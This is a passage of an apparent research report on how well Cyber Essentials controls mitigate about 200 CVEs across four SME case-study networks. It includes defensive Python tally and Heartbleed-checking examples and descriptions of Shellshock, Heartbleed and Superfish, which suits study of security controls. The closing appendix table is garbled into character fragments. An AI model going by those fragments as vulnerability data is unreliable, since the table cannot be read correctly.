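class Vuln:
    ident: str     # label only; constructed for this example, not a real CVE identifier
    kind: str      # "hardware" or "software"
    product: str   # hardware vendor, or name of the software product
    verdict: str   # assessed outcome with the Cyber Essentials controls in place


@dataclass(frozen=True)
class Network:
    name: str
    hardware_vendors: frozenset  # vendors of infrastructure devices in use
    software: frozenset          # software in use or likely in use


def applies(v: Vuln, net: Network) -> bool:
    """Applicability rule from the report: vendor match for hardware flaws,
    product-in-use for software flaws."""
    if v.kind == "hardware":
        return v.product in net.hardware_vendors
    if v.kind == "software":
        return v.product in net.software
    raise ValueError(f"unknown vulnerability kind: {v.kind!r}")


def full_list_tally(vulns) -> Counter:
    """Worst-case, fully inclusive assessment: every entry is taken as applicable."""
    for v in vulns:
        if v.verdict not in VERDICTS:
            raise ValueError(f"{v.ident}: bad verdict {v.verdict!r}")
    return Counter(v.verdict for v in vulns)


def network_tally(vulns, net: Network):
    """Number of applicable entries for a network and the verdict breakdown among them."""
    applicable = [v for v in vulns if applies(v, net)]
    return len(applicable), Counter(v.verdict for v in applicable)


def unfixable_hardware(vulns, net: Network) -> set:
    """Vendors whose devices, present on this network, carry a flaw the controls
    cannot mitigate: the candidates for replacement or a device blacklist."""
    return {v.product for v in vulns
            if v.kind == "hardware" and v.verdict == "not" and applies(v, net)}


# Constructed sample data: labels, inventories and verdicts are illustrative assumptions.
VULNS = [
    Vuln("V1", "software", "Internet Explorer", "mitigated"),  # vendor patch available
    Vuln("V2", "software", "Firefox", "mitigated"),
    Vuln("V3", "software", "Adobe Reader", "partial"),         # awaiting vendor fix
    Vuln("V4", "hardware", "TP-Link", "partial"),              # awaiting firmware fix
    Vuln("V5", "hardware", "Juniper", "mitigated"),
    Vuln("V6", "hardware", "D-Link", "not"),                   # inherent flaw, no fix
    Vuln("V7", "software", "Docker", "mitigated"),
]

NETWORKS = [
    Network("Net-A", frozenset({"Dell", "TP-Link"}),
            frozenset({"Internet Explorer", "Firefox"})),
    Network("Net-B", frozenset({"Dell", "TP-Link", "D-Link"}),
            frozenset({"Internet Explorer", "Firefox", "Adobe Reader"})),
]


def summary(vulns=VULNS, networks=NETWORKS) -> list:
    """One line per assessment, in the form the report's figures summarise."""
    n = len(vulns)
    full = full_list_tally(vulns)
    lines = ["full list (%d): %s" % (n, ", ".join(f"{k}={full[k]}" for k in VERDICTS))]
    for net in networks:
        count, tally = network_tally(vulns, net)
        lines.append("%s: %d/%d applicable; %s; replace: %s" % (
            net.name, count, n,
            ", ".join(f"{k}={tally[k]}" for k in VERDICTS),
            ", ".join(sorted(unfixable_hardware(vulns, net))) or "none"))
    return lines


if __name__ == "__main__":
    print("\n".join(summary()))
```

Swapping in a real inventory and the report's verdict column for each CVE gives the per-network counts directly; the "replace" column is the device blacklist the text proposes, derived rather than maintained by hand.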
Case Studies
Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.
• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.
• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.
• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.
• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.
Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.
Figure 5: SME-1 Network
The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.
As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.
Services: At the head office site a Windows file server (Samba) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.
Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules are in place to allow external access to the same system for off-site employees.
Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smartphones (technically the latter is not permitted by policy, but the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.
Access logs for network operations are not created, and any machine in the office can access the network, with no isolated islands.
User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.
Operating systems: Locally everything is Windows 7; the remote site uses Windows 7, and 2 remote machines are Windows 8.1.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.
Figure 6: SME-1 Vulnerability Mitigation
Because much of this SME's operations are carried out via browser-based interfaces to other financial companies (such as banks), it is placed in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, the company ends up with several different browsers, with several versions of each, to cover all its requirements, exposing it many times over to browser-based vectors.
Additionally, the heavy use of SSL-based communication places the company in a position where any SSL vulnerabilities affect it too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25 people based across multiple offices in one building.
Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.
Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.
Figure 7: SME-2 Network
Services: Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled (note that Windows XP left extended support in April 2014, so auto-update no longer delivers security fixes for those machines).
Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.
User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.
Figure 8: SME-2 Vulnerability Mitigation
The specialist SME had the fewest potential vulnerabilities overall, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerabilities in the network, responsibility is handed to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.
Employees are restricted from using their own devices unless the device is validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.
Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.
Figure 9: SME-3 Network
Services: Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.
All services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.
User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.
Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.
Figure 10: SME-3 Vulnerability Mitigation
The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use; a bespoke policy may then be put in place for the others.
When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11: SME-4 Network
Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.
The guest network is split from the office network through a secondary access point name, filtering traffic into a separate VLAN internal to the router.
Services: No local servers are present to provide any service to employees or guests on the network.
File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.
All the services are accessed over SSL-secured connections (mainly HTTPS).
User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.
Operating systems: The company uses iOS for its mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.
Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.
Figure 12: SME-4 Vulnerability Mitigation
Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, so it is exposed to a wide variety of attack vectors through the web.
Thankfully, the services and servers it connects to are run by larger corporations which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.
For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services it uses must also not have, leaving it open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.
Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.
Services: Local - File, Email, Database and Domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.
User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.
Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.
Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.
Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster, Page 8 of 28
Figure 13: Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.
The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.
The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.
The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.
The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities
The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.
These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.
With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"
Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
CVE-2014-6271 [13]
The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.
The threat was particularly insidious for SMEs who used Linux/Unix based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.
"Heartbleed"
Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.
As described in the original CVE report:
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0160 [12]
As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.
Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.
It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
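As an added example of the patch-management check an SME can run itself (example code written for this edit, not from the report), the following Python classifies an "openssl version" banner against the affected range quoted above, OpenSSL 1.0.1 before 1.0.1g, and triages a constructed host inventory. It also flags 1.0.2-beta1, which the OpenSSL project's advisory listed as affected although the CVE text above does not name it; the host names and banners are constructed.

```python
import re

# Added example (not the report's own tooling): decide from an "openssl version"
# banner whether a host runs an upstream OpenSSL release in the range named by
# CVE-2014-0160, OpenSSL 1.0.1 through 1.0.1f (fixed in 1.0.1g).
BANNER_RE = re.compile(
    r"^OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]?)(-beta\d+)?", re.IGNORECASE
)


def parse_openssl_banner(banner):
    """Return (major, minor, patch, letter, beta) or None for an unparseable banner."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor, patch, letter, beta = m.groups()
    return int(major), int(minor), int(patch), letter.lower(), (beta or "").lower()


def heartbleed_status(banner):
    """
    'vulnerable'   : release letter lies in 1.0.1 .. 1.0.1f (or 1.0.2-beta1)
    'not_affected' : 1.0.1g or later, or a branch the bug never shipped in
    'unknown'      : banner could not be parsed
    """
    parsed = parse_openssl_banner(banner)
    if parsed is None:
        return "unknown"
    major, minor, patch, letter, beta = parsed
    if (major, minor, patch) == (1, 0, 1):
        # Release letters sort alphabetically; "" (plain 1.0.1) sorts first.
        return "vulnerable" if letter < "g" else "not_affected"
    if (major, minor, patch) == (1, 0, 2) and beta == "-beta1":
        # Listed as affected in the OpenSSL project's own advisory.
        return "vulnerable"
    return "not_affected"


def triage(inventory):
    """Group hosts by status so the ones needing the 1.0.1g update stand out.
    Distribution packages often backport the fix without changing the letter
    (a patched "1.0.1e-fips" still reports 1.0.1e), so 'vulnerable' here means
    'confirm against the package changelog', not 'confirmed exploitable'."""
    groups = {"vulnerable": [], "not_affected": [], "unknown": []}
    for host, banner in inventory:
        groups[heartbleed_status(banner)].append(host)
    return groups


# Constructed inventory: host names are invented, banners follow the format
# that "openssl version" prints.
SAMPLE_INVENTORY = [
    ("mail-1", "OpenSSL 1.0.1e 11 Feb 2013"),
    ("web-1", "OpenSSL 1.0.1g 7 Apr 2014"),
    ("web-2", "OpenSSL 1.0.1 14 Mar 2012"),
    ("legacy", "OpenSSL 0.9.8y 5 Feb 2013"),
    ("staging", "OpenSSL 1.0.2-beta1 24 Feb 2014"),
    ("router", "dropbear v2013.62"),
]

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:13s} {', '.join(hosts) or '-'}")
```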
"Superfish"
The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.
CVE-2015-2077 [14]
This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.
The vector is through the SuperFish software, essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they then have full access to any SSL-secured connection from the target machine.
Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.
With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.
Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.
In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.
SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.
Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions
The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope: It is important to consider that the scope of this study covers only internet-based commodity-level attacks and, although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.
The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, to deliver additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.
An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most used controls could be seen as those providing the most intuitive or easily understood protection (data loss prevention, strong passwords and firewall), while patch management isn't necessarily understood by individuals as a tool to greatly improve cyber security.
Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber safety.
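To show how proportions like the ones above follow from the Cyber Controls Applicability appendix, here is an added Python example (written for this edit, not the report's own tooling) that parses rows in the appendix's column order, counts which CVEs apply to each network, summarises the outcome with Cyber Essentials per network, and computes the share of mitigated or partially mitigated CVEs in which each of the five controls is credited. The rows are a constructed ten-row subset of the appendix, and the mapping of appendix labels (Firmware Management, Strong Passwords, Anti-Malware and so on) onto the five controls is this example's assumption.

```python
import re
from collections import Counter

# Added example, not the report's own tooling: re-derive applicability counts
# and per-control mitigation shares from rows in the format of the Cyber
# Controls Applicability appendix. Column order as in the appendix:
# CVE | SME 1..4 and Idealised applicability | outcome without CE | outcome with CE.
NETWORKS = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")
CE_CONTROLS = ("Boundary Firewalls", "Secure Configuration", "Access Control",
               "Patch Management", "Malware Protection")

# Constructed subset of the appendix rows.
SAMPLE_ROWS = """
CVE-2013-0008 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0172 | y n n n n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-1140 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2803 | n n n n n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-7043 | n n n y n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2014-0001 | y n y n n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0160 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0259 | y y y y y | Not Mitigated | Mitigated - Malware Protection & Patch Management
"""


def canonical_control(label):
    """Map a control label as written in the appendix onto one of the five
    Cyber Essentials controls (assumed mapping); labels that are not CE
    controls, such as Website Blacklisting or SSL, become 'Other'.
    Firmware updates are counted as patching."""
    text = label.lower()
    if "firewall" in text:
        return "Boundary Firewalls"
    if "secure configuration" in text:
        return "Secure Configuration"
    if "access" in text or "password" in text:
        return "Access Control"
    if "patch" in text or "firmware" in text:
        return "Patch Management"
    if "malware" in text:
        return "Malware Protection"
    return "Other"


def parse_rows(text):
    """Parse pipe-separated appendix rows into dicts."""
    rows = []
    for line in text.strip().splitlines():
        cve, flags, without_ce, with_ce = (c.strip() for c in line.split("|"))
        # "Mitigated - Firewall, ..." -> the outcome plus the controls credited.
        outcome, _, credited = with_ce.partition(" - ")
        labels = [lab for lab in re.split(r"\s*(?:,|&)\s*", credited) if lab]
        rows.append({
            "cve": cve,
            "applicable": dict(zip(NETWORKS, (f == "y" for f in flags.split()))),
            "without_ce": without_ce,
            "outcome": outcome,
            "controls": sorted({canonical_control(lab) for lab in labels}),
        })
    return rows


def applicable_counts(rows):
    """The report's 'of the N listed vulnerabilities, M were applicable' figure."""
    return {n: sum(r["applicable"][n] for r in rows) for n in NETWORKS}


def mitigation_for(rows, network):
    """Outcome distribution with CE over the CVEs that apply to one network
    (what the per-SME Vulnerability Mitigation figures summarise)."""
    return Counter(r["outcome"] for r in rows if r["applicable"][network])


def control_shares(rows):
    """Share of the (partially) mitigated CVEs in which each control is
    credited, the basis of a 'patch management helps in X%' style figure."""
    helped = [r for r in rows if r["outcome"] != "Not Mitigated"]
    hits = Counter(c for r in helped for c in r["controls"])
    return {c: (hits[c] / len(helped) if helped else 0.0)
            for c in CE_CONTROLS + ("Other",)}


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    print("applicable:", applicable_counts(rows))
    print("SME 4 with CE:", dict(mitigation_for(rows, "SME 4")))
    for control, share in control_shares(rows).items():
        print(f"{control:21s} {share:6.1%}")
```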
Recommendations
To further improve cyber security across the UK, we recommend that:
1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.
2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.
3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.
References
[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.
[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.
[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.
[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.
[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.
[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.
[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.
[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.
[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.
[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.
[13] Mitre.org. CVE-2014-6271 aka ShellShock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.
[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.
[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.
[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.
[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
